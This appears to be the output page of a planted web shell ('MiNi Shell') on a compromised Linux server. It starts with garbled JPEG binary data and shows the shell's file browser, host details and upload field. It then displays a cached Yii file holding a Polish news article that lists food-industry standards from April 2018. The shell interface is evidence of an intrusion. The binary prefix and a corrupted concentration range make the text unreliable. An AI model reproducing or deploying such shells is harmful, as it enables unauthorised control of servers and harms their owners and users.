JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/cache/99/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/frontend/runtime/cache/99/994c9970fa57a659374bc17bf6df2d2c.bin

a:2:{i:0;a:2:{i:0;s:11969:" 
                    
                    <h3 class="title" itemprop="headline">Polskie Normy dotyczące branży spożywczej - kwiecień 2018</h3>
                    <p><span class="glyphicon glyphicon-time" aria-hidden="true"></span> <strong itemprop="datePublished"> 09-05-2018, 00:00</strong>
                        <meta itemprop="dateModified" content=" 09-05-2018, 00:00"/>
                        <div class="hide" itemprop="description">
	Zestawienie Polskich Norm dotyczących branży spożywczej - kwiecień 2018</div>
                        <div class="hide" itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
                            <meta itemprop="name" content="jedzenie.info.pl">
                            <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
                                <meta itemprop="url" content="https://www.jedzenie.info.pl/images/loga/jedzenie.jpg">
                            </div>
                        </div>
                        <div class="hide" itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
                            <meta itemprop="url" content="https://common.v-manager.pl/uploads/images/articles/61135/crop/800x600/ce0d6ec76c-683314001571974161.webp">
                        </div>
                        <meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://www.jedzenie.info.pl/artykuly/szczegoly/61135"/>
                        
                                        </p>

                    <div class="lorem">
                        <h3 style="text-align:center;">
	<span style="color:rgb(0,51,51);">Zestawienie Polskich Norm dotyczących branży spożywczej</span></h3>
<h3 style="text-align:center;">
	<span style="color:rgb(0,51,51);">- kwiecień 2018</span></h3>
<div>
	 </div>
<h4>
	<span style="color:#ff8c00;">PN-ISO 16305:2018-04 - wersja polska</span></h4>
<p>
	<strong>Data publikacji:</strong> 03-04-2018</p>
<p>
	Masło -- Oznaczanie zwięzłości</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszej Normie Międzynarodowej określono metodę oznaczania zwięzłości masła.</p>
<p>
	Niniejsza metoda ma zastosowanie również do masła wyprodukowanego poprzez odtworzenie ze składników mleka, napowietrzenie masła oraz do masła, do którego został dodany tłuszcz roślinny, zioła lub inne środki spożywcze. Jakiekolwiek zmiany w odniesieniu do przygotowania masła będą jednak wpływać na jego cechy zwięzłości. Dlatego dla celów niniejszej Normy Międzynarodowej takich produktów nie uwzględniono.</p>
<p>
	UWAGA Zwięzłość masła określona niniejszą metodą jest skorelowana ze smarownością masła, jak zostało to określone za pomocą testu panelowego (patrz Pozycja bibliograficzna [4]).</p>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PN-ISO 1446:2004/A1:2018-04 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>03-04-2018</p>
<p>
	Kawa zielona -- Oznaczanie zawartości wody -- Podstawowa metoda odwoławcza</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	Dodano ostrzeżenie poniżej tytułu i powyżej zakresu.</p>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PN-ISO 7513:2004/A1:2018-04 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji:</strong> 03-04-2018</p>
<p>
	Herbata rozpuszczalna w postaci stałej -- Oznaczanie zawartości wody (ubytku masy w temperaturze 103 stopni C)</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	Zmieniono tekst w: Wprowadzenie, Rozdział 3, Rozdział 5, Podrozdział 7.3</p>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PN-ISO 6668:2018-04 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>13-04-2018</p>
<p>
	Kawa zielona -- Przygotowanie próbek do analizy sensorycznej</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszej Normie Międzynarodowej opisano metodę palenia kawy zielonej, mielenia kawy palonej oraz przygotowanie naparu - z kawy rozdrobnionej - do analizy sensorycznej.</p>
<p>
	Analiza sensoryczna przeprowadzona według niżej podanej metody może mieć zastosowanie przy akceptacji lub odrzuceniu ładunku kawy w zależności od uzgodnień zainteresowanych stron. Uogólniając, próbka wymagać będzie lekkiego upalenia w celu określenia wad i średniego upalenia w celu oznaczenia zapachu i barwy.</p>
<p>
	Napar przygotowany według postanowień niniejszej normy międzynarodowej może być użyty nie tylko do kontroli jakościowej, lecz również do porównawczej oceny różnych próbek, przy czym dla każdej próbki powinna być zastosowana identyczna procedura.</p>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PN-EN ISO 11747:2012/A1:2018-04 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji:</strong> 24-04-2018</p>
<p>
	Ryż -- Oznaczanie oporności na wytłaczanie ziarn ryżu po ugotowaniu</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	Zamieniono tekst w Podrozdziałach 10.2 i 10.3 na inny. Zmieniono tytuł Tablicy B.1 oraz zamieniono Tablicę B.2.</p>
<p>
	 </p>
<h4>
	<span style="color:#ff8c00;"><strong>PN-EN ISO 7393-2:2018-04 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>24-04-2018</p>
<p>
	Jakość wody -- Oznaczanie chloru wolnego i chloru ogólnego -- Część 2: Metoda kolorymetryczna z N,N-dialkilo-1,4-fenylenodiaminą, do rutynowych celów kontrolnych</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszym dokumencie określono metodę oznaczania chloru wolnego i chloru ogólnego w wodzie, łatwą do zastosowania w warunkach laboratoryjnych i terenowych. Polega ona na pomiarze absorpcji czerwonego kompleksu barwnego DPD, wykonywanym za pomocą fotometru, lub intensywności barwy, wykonywanym przez wizualne porównanie z systematycznie kalibrowaną skalą wzorców. Metoda jest odpowiednia dla wody do spożycia i dla innych wód, w których dodatek halogenów jak brom i jod i innych czynników utleniających jest znikomy. W wodzie morskiej i w wodach zawierających bromki i jodki oznaczanie należy wykonywać z 03-04-201800 4 mmol/l do 0,07 mmol/l (np. 0,03 mg/l do 5 mg/l) chloru ogólnego. Przy wyższych stężeniach próbkę analityczną rozcieńcza się. Metoda jest zwykle stosowana jako metoda terenowa, z użyciem przenośnych fotometrów i dostępnych w handlu gotowych odczynników (w postaci ciekłej, proszku i pastylek). Jest istotne, aby te odczynniki spełniały wymagania minimalne i zawierały zasadnicze odczynniki oraz system buforowy zapewniający doprowadzenie pH mierzonego roztworu do typowego od 6,2 do 6,5. Jeżeli istnieje przypuszczenie, że próbki wody mogą mieć nietypowe pH i/lub możliwości buforowania, użytkownik powinien to sprawdzić i w razie potrzeby doprowadzić pH próbki do wymaganego zakresu. pH próbki powinno mieścić się w zakresie od 4 do 8. Skorygować, jeśli to konieczne, przed badaniem roztworem wodorotlenku sodu lub kwasem siarkowym. W Załączniku A zamieszczono procedurę różnicowania chloru związanego typu monochloroaminy, chloru związanego typu dichloroaminy oraz chloru związanego w formie trójchlorku azotu. W Załączniku C przedstawiono procedurę oznaczania chloru wolnego i chloru ogólnego w wodzie do spożycia i innych wodach o małym zanieczyszczeniu, z użyciem jednorazowych płaskich kuwet napełnionych odczynnikami oraz średnioprzepływowej pompy/kolorymetru.</p>
<p>
	 </p>
<hr />
<p style="text-align:right;">
	Zestawienie zostało opracowane przez Redakcję Jedzenie.info.pl<br />
	na podstawie ogólnodostępnych informacji publikowanych przez PKN.</p>                        
                         
 
                        <div class="googleads-article">
<!-- script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script -->
<!-- vManager - w treści artykułu 2 -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-6177099932506559"
     data-ad-slot="9192484574"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
                        </div>


                           
                    </div>
                    
                    <div class="text-center">
                                        </div>

                                            
                      
                        
                        
                    
                                        <div class="portal-light-background p1em mt1" itemprop="author" itemscope itemtype="https://schema.org/Person">
                        <strong>Źródło:</strong> 
                        <span itemprop="name">
                                                            <a href="http://www.pkn.pl" target="_blank">
                                                    
                            Polski Komitet Normalizacyjny                                                        
                                                            </a>
                                                    </span>
                        <br>
                    </div>
                                        
                                            <div class="nav-table tags mt05">
                            <div>Tagi:</div>    
                            <div>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Polski+Komitet+Normalizacyjny" class="label label-default">Polski Komitet Normalizacyjny</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Polskie+Normy" class="label label-default">Polskie Normy</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=zestawienie" class="label label-default">zestawienie</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=kwiecień+2018" class="label label-default">kwiecień 2018</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=branża+spożywcza" class="label label-default">branża spożywcza</a>
                                                            </div>
                        </div>
                                            
                        
                    <div id="fb-root"></div>
                    <!--script async defer crossorigin="anonymous" src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0" nonce="2g9iczzS"></script-->
                    
<script>
//<![CDATA[
var lx=!1;window.addEventListener("scroll",function(){(0!=document.documentElement.scrollTop&&!1===lx||0!=document.body.scrollTop&&!1===lx)&&(!function(){var e=document.createElement("script");e.type="text/javascript",e.async=!0,e.src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(e,a)}(),lx=!0)},!0);
//]]>
</script>
                    
                    <div class="social text-center mb1">
                        <div class="fb-like" data-href="https://www.jedzenie.info.pl/artykuly/szczegoly/61135_polskie-normy-dotyczace-branzy-spozywczej-kwiecien-2018" data-width="" data-layout="button" data-action="like" data-show-faces="false" data-share="true"></div>
                    </div>

                    
                    <div id="articles">    
                        
                    
                                    ";i:1;N;}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:2:{i:0;s:13:"article_61135";i:1;s:8:"articles";}s:4:"data";a:2:{s:32:"e8526442a0d9fc4d9d8cd95b649fe4f8";s:21:"0.55632500 1747701941";s:32:"9f4ebfa1b76d6bc6617aec9034853422";s:21:"0.22954000 1749980350";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com